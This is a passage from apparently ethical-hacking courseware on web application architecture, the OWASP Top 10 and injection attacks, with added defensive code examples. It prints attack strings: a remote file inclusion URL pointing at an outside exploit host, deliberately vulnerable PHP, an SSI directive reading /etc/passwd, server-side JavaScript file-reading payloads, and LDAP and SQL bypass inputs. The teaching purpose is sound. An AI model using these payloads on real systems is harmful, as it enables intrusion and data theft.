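    """In-memory database standing in for the database layer (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("keyboard", 25.0), ("mouse", 12.5)])
    return conn


def application_server(path, query, conn):
    """Application server: runs the server-side script for a dynamic page.

    Only one script, /product.php, exists in this example; it looks a product up
    by id with a parameterized query so the id never becomes part of the SQL text.
    """
    if path != "/product.php":
        return 404, "no such script"
    product_id = query.get("id", [""])[0]
    if not product_id.isdigit():
        return 400, "id must be numeric"
    row = conn.execute("SELECT name, price FROM products WHERE id = ?",
                       (int(product_id),)).fetchone()
    if row is None:
        return 404, "product not found"
    return 200, f"<p>{row[0]}: {row[1]:.2f}</p>"


def web_server(url, conn):
    """Web server: inspect the extension and either serve the file or delegate."""
    parts = urlsplit(url)
    path, query = parts.path or "/", parse_qs(parts.query)
    ext = os.path.splitext(path)[1].lower()
    if ext in STATIC_EXTENSIONS:
        body = STATIC_FILES.get(path)
        return (200, body) if body is not None else (404, "file not found")
    if ext in DYNAMIC_EXTENSIONS:
        return application_server(path, query, conn)
    # Anything else (config files, backups, no extension) is refused rather than
    # served as static content.
    return 403, "extension not served"


if __name__ == "__main__":
    db = build_database()
    for url in ("/index.html", "/product.php?id=2", "/product.php?id=abc", "/secret.ini"):
        print(url, "->", web_server(url, db))
```

The allow-list of served extensions is the security-relevant design choice: a web server that serves any file it finds under the document root will happily hand out configuration files and backups that a developer left beside the pages.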

Figure 14.1: Working of web applications

Web Application Architecture
Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of the web application depends on its architecture, which includes hardware and software that perform tasks such as reading the request as well as searching, gathering, and displaying the required data.
The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It consists of three layers:
1. Client or presentation layer
2. Business logic layer
3. Database layer
The client or presentation layer includes all physical devices present on the client side, such as laptops, smartphones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server then responds to the request and fetches the requested data; the application finally displays this response in the browser in the form of a web page.
The "business logic" layer itself consists of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component, e.g., a server. The firewall offers security to the content, the HTTP request parser handles requests coming from clients and forwards responses to them, and the resource handler is capable of handling multiple requests simultaneously. The web-server logic layer contains code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).
The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware". It defines the flow of data, according to which the developer builds the application using programming languages. It stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database. This layer contains the software and defines the steps to search and fetch the data.
The database layer consists of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in a structured form (e.g., MS SQL Server, MySQL server).

Figure 14.2: Web Application Architecture

Web Services
A web service is an application or software that is deployed over the Internet. It uses a standard messaging protocol (such as SOAP) to enable communication between applications developed on different platforms. For instance, Java-based services can interact with PHP applications. These web-based applications are integrated with SOAP, UDDI, WSDL, and REST across the network.
Web Service Architecture
A web service architecture describes the interactions among the service provider, service requester, and service registry. These interactions consist of three operations, namely publish, find, and bind. All these roles and operations work together on web service artifacts known as software modules (services) and their descriptions.
Service providers offer web services. They deploy and publish service descriptions of a web service to a service registry. Requesters find these descriptions from the service registry and use them to bind with the web service provider and invoke the web service implementation.
There are three roles in a web service:
▪ Service Provider: It is a platform from where services are provided.
▪ Service Requester: It is an application or client that is seeking a service or trying to establish communication with a service. In general, the browser is a requester, which invokes the service on behalf of a user.
▪ Service Registry: It is the place where the provider loads service descriptions. The service requester discovers the service and retrieves binding data from the service descriptions.
There are three operations in a web service architecture:
▪ Publish: During this operation, service descriptions are published to allow the requester to discover the services.
▪ Find: During this operation, the requester tries to obtain the service descriptions. This operation can be processed in two different phases: obtaining the service interface description at development time and obtaining the binding and location description calls at run time.
▪ Bind: During this operation, the requester calls and establishes communication with the services during run time, using binding data inside the service descriptions to locate and invoke the services.
There are two artifacts in a web service architecture:
▪ Service: It is a software module offered by the service provider over the Internet. It communicates with the requesters. At times, it can also serve as a requester, invoking other services in its implementation.
▪ Service Description: It provides interface details and service implementation details. It consists of all the operations, network locations, binding details, data types, etc. It can be stored in a registry and invoked by the requester.
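The three roles, three operations and two artifacts above, put together in a small in-process model. This is an added example and not part of the courseware or of any web services toolkit: the registry, the `QuoteService` name, its `getQuote` operation, the placeholder endpoint URL and the price table are invented for illustration. The point it shows is that the requester never holds a reference to the provider's code directly; it only ever holds what the registry returned, and it checks the interface it found against the call it is about to make before binding.

```python
"""Publish, find and bind in a web service architecture.

Added example (not from the courseware): a minimal in-process registry with the
three roles (provider, requester, registry) and the three operations the text
describes. Service names, endpoints and the price-quote operation are invented.
"""
from dataclasses import dataclass, field


@dataclass
class ServiceDescription:
    """Artifact: interface details plus binding details, as a registry entry holds them."""
    name: str
    interface: dict               # operation name -> list of parameter names
    endpoint: str                 # network location (placeholder URL in this example)
    binding: str                  # e.g. "SOAP/HTTP" or "REST/JSON"
    implementation: object = field(default=None, repr=False)  # provider's callable


class ServiceRegistry:
    """Service registry role: holds published descriptions."""

    def __init__(self):
        self._entries = {}

    def publish(self, description):
        """Publish operation: the provider registers a description."""
        if description.name in self._entries:
            raise ValueError(f"{description.name} already published")
        self._entries[description.name] = description

    def find(self, name, required_operation=None):
        """Find operation: return a description, or None if absent or lacking the operation."""
        desc = self._entries.get(name)
        if desc is None:
            return None
        if required_operation is not None and required_operation not in desc.interface:
            return None
        return desc


class ServiceRequester:
    """Service requester role: find a description, bind to it, then invoke."""

    def __init__(self, registry):
        self.registry = registry

    def call(self, service_name, operation, **kwargs):
        desc = self.registry.find(service_name, operation)
        if desc is None:
            raise LookupError(f"no service {service_name!r} offering {operation!r}")
        # Bind operation: check the call against the published interface, then use
        # the binding data (here, the implementation reference) to reach the service.
        expected = desc.interface[operation]
        if set(kwargs) != set(expected):
            raise TypeError(f"{operation} expects {expected}, got {sorted(kwargs)}")
        return desc.implementation(operation, **kwargs)


def quote_service(operation, **kwargs):
    """Service provider role: the implementation behind the published description."""
    prices = {"keyboard": 25.0, "mouse": 12.5}          # constructed data
    if operation == "getQuote":
        return {"item": kwargs["item"], "price": prices.get(kwargs["item"])}
    raise ValueError(f"unsupported operation {operation!r}")


def demo():
    """Provider publishes, requester finds and binds, then invokes getQuote."""
    registry = ServiceRegistry()
    registry.publish(ServiceDescription(
        name="QuoteService",
        interface={"getQuote": ["item"]},
        endpoint="https://provider.example/quote",   # placeholder endpoint
        binding="SOAP/HTTP",
        implementation=quote_service,
    ))
    requester = ServiceRequester(registry)
    return requester.call("QuoteService", "getQuote", item="mouse")


if __name__ == "__main__":
    print(demo())
```

In a real deployment the registry is UDDI, the description is a WSDL document and the binding carries the endpoint and transport; the interface check before binding is what stops a requester from invoking an operation the provider never published.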

Figure 14.3: Web Service Architecture (service requester, service registry containing service descriptions, and service provider)
Characteristics of Web Services
▪ XML-based: Web services use XML for data representation and transportation. XML usage can avoid OS, networking, or platform binding. Applications that provide web services are highly interoperable.
▪ Coarse-grained service: In web services, some objects contain a massive amount of information and offer greater functionality than fine-grained services. A coarse-grained service is a combination of multiple fine-grained services.
▪ Loosely coupled: Web services support a loosely coupled approach for interconnecting systems. The interaction between the systems can occur via the web API by sending XML messages. The web API incorporates a layer of abstraction for the infrastructure to make the connection flexible and adaptable.
▪ Asynchronous and synchronous support: Synchronous services are called by users who wait for a response, whereas asynchronous services are called by users who do not wait for a response. RPC-based messages and document-based messages are often used for synchronous and asynchronous web services. Synchronous and asynchronous endpoints are implemented using servlets, SOAP/XML, and HTTP.
▪ RPC support: Web services support remote procedure calls (RPC) similarly to traditional applications.
Types of Web Services
Web services are of two types:
▪ SOAP web services
The Simple Object Access Protocol (SOAP) defines the XML format. XML is used to transfer data between the service provider and the requester. It also determines the procedure to build web services and enables data exchange between different programming languages.
▪ RESTful web services
Representational State Transfer (RESTful) web services are designed to make the services more productive. They use many underlying HTTP concepts to define the services. It is an architectural approach rather than a protocol like SOAP.
Components of Web Service Architecture:
▪ UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available.
▪ WSDL: Web Services Description Language is an XML-based language that describes and traces web services.
▪ WS-Security: Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.
There are other important features/components of the web service architecture, such as WS-Work Processes, WS-Policy, and WS Security Policy, which play an important role in communication between applications.

Vulnerability Stack
One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security.
All the mechanisms or services employed at each layer enable the user to access the web application securely. When considering web applications, the organization considers security as a critical component because web applications are major sources of attacks. The vulnerability stack shows various layers and the corresponding elements/mechanisms/services that make web applications vulnerable.
Figure 14.4: Vulnerability Stack (layers 7 to 1: custom web applications; third-party components; web server; database; operating system; network; security)

Attackers exploit the vulnerabilities of one or more elements among the seven levels to gain unrestricted access to an application or the entire network.
▪ Layer 7
If an attacker finds vulnerabilities in the business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS.
▪ Layer 6
Third-party components are services that integrate with the website to achieve certain functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website). When customers choose a product to buy, they click on the Buy/Checkout button. This redirects them to their online banking account through a payment gateway. Third-party websites such as citrix.com offer such payment gateways. Attackers might exploit such redirection and use it as a medium/pathway to enter Amazon.com and exploit it.
▪ Layer 5
Web servers are software programs that host websites. When users access a website, they send a URL request to the web server. The server parses this request and responds with a web page that appears in the browser. Attackers can perform footprinting on a web server that hosts the target website and grab banners that contain information such as the web server name and its version. They can also use tools such as Nmap to gather such information. Then, they might start searching for published vulnerabilities in the CVE database for that particular web server or service version number and exploit any that they find.
▪ Layer 4
Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. There could be vulnerabilities in the database of the target website. These vulnerabilities can be exploited by attackers using tools such as sqlmap to gain control of the target's database.
▪ Layer 3
Attackers scan an operating system to find open ports and vulnerabilities, and they develop viruses/backdoors to exploit them. They send malware through the open ports to the target machine; by running such malware, they can compromise the machine and gain control over it. Later, they try to access the databases of the target website.
▪ Layer 2
Routers/switches route network traffic only to specific machines. Attackers flood these switches with numerous requests that exhaust the CAM table, causing it to behave like a hub. Then, they focus on the target website by sniffing data (in the network), which can include credentials or other personal information.
▪ Layer 1
IDS and IPS raise alarms if any malicious traffic enters a target machine or server. Attackers adopt evasion techniques to circumvent such systems so that they do not trigger any alarm while exploiting the target.
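The Layer 7 entry above names input validation attacks such as XSS; the defence at that layer is validating input on the server and encoding output for the context it is inserted into. The following is an added example, not code from the courseware: it renders a constructed "search results" page fragment from user-supplied text twice, once with raw concatenation (the defect that makes the layer vulnerable) and once with HTML encoding, with a server-side allow-list check in front of both. The template, the allow-list pattern and the sample inputs are invented.

```python
"""Layer 7 defence against an input validation attack (XSS): validate, then encode.

Added example (not from the courseware). The page template, the allow-list and
the sample inputs are constructed.
"""
import html
import re

TEMPLATE = "<p>Results for: {term}</p>"
# Allow-list for the search term: word characters, spaces and a few punctuation marks,
# 1 to 64 characters. Angle brackets, quotes-as-delimiters and semicolons are not in it.
TERM_PATTERN = re.compile(r"[\w .,'-]{1,64}")


def render_unsafe(term):
    """Vulnerable version: raw concatenation lets markup in user input become part of the page."""
    return TEMPLATE.format(term=term)


def render_safe(term):
    """Hardened version: encode for the HTML text context before inserting."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def validate_term(term):
    """Server-side input validation: return the term if it matches the allow-list, else None.

    Validation complements output encoding rather than replacing it: encoding is
    what makes the page safe, validation rejects junk early and gives a clear error.
    """
    return term if TERM_PATTERN.fullmatch(term) else None


def handle_search(term):
    """Server-side handler: validate first, then always encode on output."""
    if validate_term(term) is None:
        return 400, render_safe("invalid search term")
    return 200, render_safe(term)


if __name__ == "__main__":
    sample = "<script>alert(1)</script>"          # constructed input containing markup
    print(render_unsafe(sample))
    print(render_safe(sample))
    print(handle_search(sample))
    print(handle_search("blue keyboard"))
```

The encoding is context-specific: `html.escape` is correct for text between tags and for quoted attribute values, but a value placed inside a script block, a URL or a CSS rule needs the encoder for that context instead.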

Web Application Threats
Attackers attempt various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses the various types of threats and attacks against the vulnerabilities of web applications.

OWASP Top 10 Application Security Risks - 2017
(Slide: Injection, Broken Authentication, Security Misconfiguration, Cross-Site Scripting (XSS), XML External Entity (XXE), Using Components with Known Vulnerabilities, Broken Access Control, Insufficient Logging and Monitoring)

Source: https://www.owasp.org
OWASP is an international organization that specifies the top 10 vulnerabilities and flaws of web applications. The latest OWASP top 10 application security risks are as follows:
A1 - Injection
Injection flaws, such as SQL, command injection, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2 - Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, thereby allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume the identities of other users (temporarily or permanently).
A3 - Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and personally identifiable information (PII) data. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data requires extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A4 - XML External Entity (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial-of-service (DoS) attacks such as the billion laughs attack.
A5 - Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, and changing access rights.

A6 - Security Misconfiguration
Security misconfiguration is the most common issue in web security, which is due in part to manual or ad hoc configuration (or no configuration at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, and not patching or upgrading systems, frameworks, dependencies, and components in a timely manner (or at all).
A7 - Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or whenever it updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.
A8 - Insecure Deserialization
Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered with, or deleted to spoof users, conduct injection attacks, and elevate privileges.
A9 - Using Components with Known Vulnerabilities
Components such as libraries, frameworks, and other software modules run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
A10 - Insufficient Logging and Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data. Most breach studies show that the time to detect a breach is over 200 days, typically by external parties rather than internal processes or monitoring.

A1 - Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Such flaws are prevalent in legacy code and often found in SQL, LDAP, and XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers.
Attackers inject malicious code, commands, or scripts in the input gates of flawed web applications such that the applications interpret and run the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below:
* SQL Injection: SQL injection is the most common website vulnerability on the Internet, and it is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.
* Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting an arbitrary malicious command supplied in the application to execute commands on the host operating system. Thus, such flaws are extremely dangerous.
* LDAP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, the attacker modifies the LDAP statement with the help of a local proxy. This, in turn, results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.

SQL Injection Attacks
SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users, validate roles and access levels, store and retrieve information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate the input before passing it to an SQL statement. For example, consider the following SQL statement:
SELECT * FROM tablename WHERE UserID = 2302
With a simple SQL injection attack, it becomes the following:
SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. Attackers carry out SQL injection attacks from the web browser's address bar, form fields, queries, searches, and so on.
SQL injection attacks allow attackers to
* Log into the application without supplying valid credentials
* Perform queries against data in the database, often even data to which the application normally would not have access
* Modify database contents or drop the database altogether
* Use the trust relationships established between the web application components to access other databases
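The following Python script is an added example, not code from the courseware: it builds a constructed in-memory SQLite table (the table name and rows are made up) and contrasts the concatenated statement above with a type-checked, parameterised version, showing why "2302 OR 1=1" returns every row in one case and nothing in the other.

```python
import sqlite3


def build_db():
    """Constructed sample table; the rows are made up for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tablename (UserID INTEGER, Name TEXT)")
    conn.executemany(
        "INSERT INTO tablename VALUES (?, ?)",
        [(2302, "alice"), (2303, "bob"), (2304, "carol")],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    """Vulnerable pattern: the input is pasted into the SQL text.

    With user_id = "2302 OR 1=1" the statement becomes
        SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
    and the WHERE clause is true for every row.
    """
    sql = "SELECT * FROM tablename WHERE UserID = " + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The '?' placeholder sends the value as data, so it can never change the
    structure of the statement; the int() check rejects "2302 OR 1=1" outright.
    """
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT * FROM tablename WHERE UserID = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "2302"))         # one row
    print(vulnerable_lookup(db, "2302 OR 1=1"))  # all three rows
    print(safe_lookup(db, "2302 OR 1=1"))        # [] : input rejected
```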

Figure 14.5: SQL injection attack
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15 SQL Injection.

Command Injection Attacks
Command injection flaws allow attackers to pass malicious code to different systems via web applications. The attacks include calls to an operating system over system calls, use of external programs over shell commands, and calls to backend databases over SQL. Scripts written in Perl, Python, and other languages execute in and are inserted into poorly designed web applications. If a web application uses any type of interpreter, attackers insert malicious code to inflict damage.
To perform various functions, web applications must use operating system features and external programs. Although many programs invoke externally, a frequently used program is the sendmail program. Carefully scrub an application before passing a piece of information through an HTTP external request. Otherwise, attackers can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting malicious SQL commands is a dangerous practice and rather widespread, as it is a command injection method. Command injection attacks are easy to carry out and discover, but they are difficult to understand.
The following are some types of command injection attacks:
* Shell Injection
  o An attacker tries to craft an input string to gain shell access to a web server
  o Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs
* HTML Embedding
  o This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application
  o In an HTML embedding attack, the user input to a web script is placed into the HTML output without being checked for HTML code or scripting
* File Injection
  o The attacker exploits this vulnerability and injects malicious code into system files
  http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evil/exploit?

Command Injection Example
An attacker enters the following malicious code (account number) with a new password:
www.certifiedhacker.com/banner.gif||newpassword||1036|601468
The last two sets of numbers denote the banner size. Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field.
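As an added example (not the courseware's code), the Python below tokenises the banner field from the example above the way a shell would, so that the extra commands hidden in it become countable, and shows the hardened form: validate the value against what a banner URL may look like and pass it as a single argv element with no shell involved. The server-side program name fetch-banner is a hypothetical placeholder.

```python
import re
import shlex

# Constructed input, copied from the banner example in the text.
ATTACK_INPUT = "www.certifiedhacker.com/banner.gif||newpassword||1036|601468"

# Characters that let a value escape a shell command line.
SHELL_META = re.compile(r"[|&;`$<>(){}\n\r'\"\\]")

# What a banner URL is allowed to look like: optional scheme, host, path, image extension.
BANNER_URL = re.compile(
    r"(https?://)?[A-Za-z0-9.\-]+(/[A-Za-z0-9._\-]+)*/[A-Za-z0-9_\-]+\.(gif|png|jpe?g)"
)


def vulnerable_command(banner_url):
    """Hypothetical server script: concatenates the form field into a shell command."""
    return "fetch-banner " + banner_url


def shell_tokens(command_line):
    """Tokenise the way /bin/sh would, so the injected commands become visible."""
    return list(shlex.shlex(command_line, posix=True, punctuation_chars=True))


def command_count(command_line):
    """Number of separate commands the shell would run for this line."""
    separators = {"|", "||", ";", "&", "&&"}
    return 1 + sum(1 for tok in shell_tokens(command_line) if tok in separators)


def is_safe_banner_url(value):
    """Allow-list check: the whole value must be a plain image URL with no metacharacters."""
    return bool(BANNER_URL.fullmatch(value)) and not SHELL_META.search(value)


def safe_argv(banner_url):
    """Hardened form: validate, then build argv for subprocess.run(argv)
    (never shell=True), so no shell ever parses the user's value."""
    if not is_safe_banner_url(banner_url):
        raise ValueError("rejected banner URL: %r" % banner_url)
    return ["fetch-banner", "--", banner_url]


if __name__ == "__main__":
    line = vulnerable_command(ATTACK_INPUT)
    print(shell_tokens(line))      # the '||' and '|' tokens split it into 4 commands
    print(command_count(line))     # 4
    print(safe_argv("www.certifiedhacker.com/banner.gif"))
```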

Figure 14.6: Command injection attack example
File Injection Attack
A file injection attack is a technique used to exploit "dynamic file include" mechanisms in web applications. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. It occurs when a user is allowed to supply input for the include command dynamically, which is not properly validated before processing. When a user provides the input, the web application passes it into "file include" commands. Most web application frameworks support file inclusion. Hence, an attacker enters a URL that redirects the application to the location of the malicious file. While referring to the file without proper validation, the application executes the file script by calling specific procedures. Web applications are vulnerable to file injection attacks if the referred files are relayed using elements from HTTP requests. PHP is particularly vulnerable to these attacks because of the extensive use of "file includes" in PHP programming and default server configurations.
If the application ends with a php extension, and if a user requests it, then the application interprets it as php script and executes it. This allows an attacker to perform arbitrary commands.
Consider the following client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>

Vulnerable PHP code:
<?php
$drink = 'coke';
// The DRINK parameter is taken straight from the request and used, unvalidated, to build a file name
if (isset($_GET['DRINK'])) {
    $drink = $_GET['DRINK'];
}
// A user-controlled value reaches require(): a remote URL supplied here is fetched and executed
require($drink . '.php');
?>
To exploit the vulnerable php code, the attacker injects a remotely hosted file at www.jasoneval.com, which contains an exploit.
Exploit code:
http://www.certifiedhacker.com/orders.php?DRINK=http://jasoneval.com/exploit?

LDAP Injection Attacks
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. The Lightweight Directory Access Protocol (LDAP) is based on the client-server model, and clients can search the directory entries using filters.

An LDAP injection attack works in the same way as an SQL injection attack, but it exploits user parameters to generate an LDAP query. The LDAP protocol runs on an Internet transport such as TCP, and it is an open-standard protocol for manipulating and querying Directory Services. An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree.
LDAP attacks exploit web-based applications constructed based on LDAP statements using a local proxy. Web applications may use user-supplied input to create custom LDAP statements for dynamic web page requests. Attackers commonly perform LDAP injection attacks on web applications employing user inputs to generate LDAP queries. The attackers can use the search filter attributes to discover the underlying LDAP query structure. Using this structure, the attacker includes additional attributes in the user-supplied input to determine whether the application is vulnerable to LDAP injection and evaluates the web application's output.
Depending on the implementation of the target, attackers use LDAP injection to achieve
* Login bypass
* Information disclosure
* Privilege escalation
* Information alteration
Example:
To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.
Figure 14.8: LDAP injection attack example (account login form with username certifiedhacker)(&)) and password blah)
If an attacker enters a valid username "certifiedhacker" and injects certifiedhacker)(&)), then the URL string becomes (&(USER=certifiedhacker)(&))(PASS=blah)). The LDAP server processes only the first filter; only the query (&(USER=certifiedhacker)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password.
An important defense method against such attacks is to filter all inputs to the LDAP; otherwise, vulnerabilities in LDAP allow the execution of unauthorized queries or modification of its contents. When the attacker modifies the LDAP statements, the process runs with the same permissions as the component of the web application that executed the command.

Other Injection Attacks
Some other types of injection attacks are discussed below:
* Server-Side JS Injection
Server-side JavaScript injections are vulnerabilities that manifest when an application dynamically integrates user-controllable values into a string that the code interpreter evaluates. Attackers exploit improper validation of user data and pass random values to alter the code that will be compiled and executed by the server. These vulnerabilities also allow attackers to compromise the functionality and data of the applications hosted by the server. Attackers can also use the server as a source to launch further attacks in the target network.
Example of server-side JavaScript injection:
Attackers can launch a DoS attack by passing commands to the eval() function:
while (1)
This command forces the server's event loop to use the complete processor time and restricts it from evaluating additional inputs until the process is reinitiated.
Attackers can also read the files' content from the server. The following commands can display the content of the current and parent directories:
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('..').toString())
After retrieving the file names, attackers can pass the following command to read the content inside the file:

res.end(require('fs').readFileSync(filename).toString())
This vulnerability can be exploited further by initiating and running malicious binary files using the fs and child_process modules.
* Server-Side Includes Injection
Server-side Includes is an application feature that helps designers to auto-generate the content of the web page without manual involvement. The # directives allow developers to perform this activity. These directives can be files, CGI variables, shell commands, etc. After evaluating all the directives, HTML is delivered to the requester.
Typical directives include:
<!--#include virtual="/footer.html" -->
<!--#echo var="DATE_LOCAL" -->
Attackers launch server-side injection attacks to take control over web applications integrated with SSI directives. Such an application accepts remote user inputs and uses them on the page. Attackers exploit this feature and pass malicious SSI directives as input values to perform malicious activities such as modifying and erasing server files, running shell commands, and taking control over critical files such as "/etc/passwd". For example, attackers may use the following malicious directive that results in the retrieval of data from /etc/passwd files, as there is no evaluation of the user inputs:
<!--#exec cmd="cat /etc/passwd" -->

* Server-Side Template Injection
While creating dynamic pages, designers or developers use template engines to segregate programming logic from data presentation. Thus, instead of storing code that accepts requests and extracts the required information from the database and passing it to users in a monolithic data file, template engines are employed to segregate the presentation of the data from the remaining code that evaluates it.
Server-side template injection occurs when users are allowed to insert unsafe inputs into a server-side template. When this vulnerability exists, attackers can inject malicious template directives to run arbitrary code and gain complete control over the target web server. This injection is similar to XSS but is often employed to target server internals and achieve remote code execution, making every vulnerable application a primary target. Template injection manifests via designers' code errors and deliberate template disclosure while showcasing rich features of applications, blogs, etc.
For example, consider the following complex PHP and HTML code:
<html>
<head>
<title>{{title}}</title>
</head>
<body>
<form method="{{method}}" action="{{action}}">
<input type="text" name="user" value="{{username}}">
<input type="password" name="pwd" value="">
<button type="submit">Submit</button>
</form>
<p> This page took {{microtime(true) - time}} seconds to render </p>
</body>
</html>
Replace the abovementioned code using template engines as follows:
$templateEngine = new TemplateEngine();
$template = $templateEngine->loadFile('signUp.tpl');
$template->assign('title', 'login');
$template->assign('method', 'post');
$template->assign('action', 'signup.php');
$template->assign('username', getUsernameFromCookie());
$template->assign('time', microtime(true));
$template->show();
The abovementioned code is vulnerable to template injection as it can execute native functions. If attackers are able to attach template files with such expressions, they can run any arbitrary function to gain access to the target web server.
* Log Injection

Attackers launch log injection attacks by exploiting unsanitized or unvalidated inputs to application logs. Applications usually store a large number of logs such as access logs, transaction logs, monitor logs, exception or error logs, GC logs, and crash logs. If an application fails to log users' or its administrator's events or actions in a secure manner, attackers could insert fake entries or records to corrupt the log file. Attackers use this technique to insert misleading information in the log file for covering their tracks in the event of a successful attack.
For instance, consider an application that logs data in the following format:
Date, Time, Username, ID, source IP, Request
The unvalidated input parameters come directly from the request:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz;
id=Walkin
Attackers can manipulate the id parameter to save the log with fake inputs:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz;
id=\r\n (Fake input)
For example, if the log fails to escape null bytes, the remainder of the string is not recorded:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz
id=400
The individual log entry is then truncated at the id field:
Date, Time, Username,
* HTML Injection
An HTML injection attack is initiated by injecting HTML code via vulnerable form inputs of a web page to change the appearance of the website or the information provided to its users. It is different from JavaScript and VBScript injection attacks. HTML is a core language employed to design a website, and it is often targeted by attackers to change its functionality and original look. If an attacker can successfully inject HTML code, legitimate users may be diverted from their intended activity.
For instance, when the HTML code is injected, it allows the attacker to create a malicious form that appears to be genuine to the end users. It requests users to re-enter their credentials. Once the form is submitted with their credentials, it exfiltrates the information to the attacker.
Example:
General application page: template for search results
<html>
<h1> Results matching the given query: </h1>
<h2> {user_query} </h2>
<ol> <li> Result A
<li> Result B </ol>
</html>
User query:
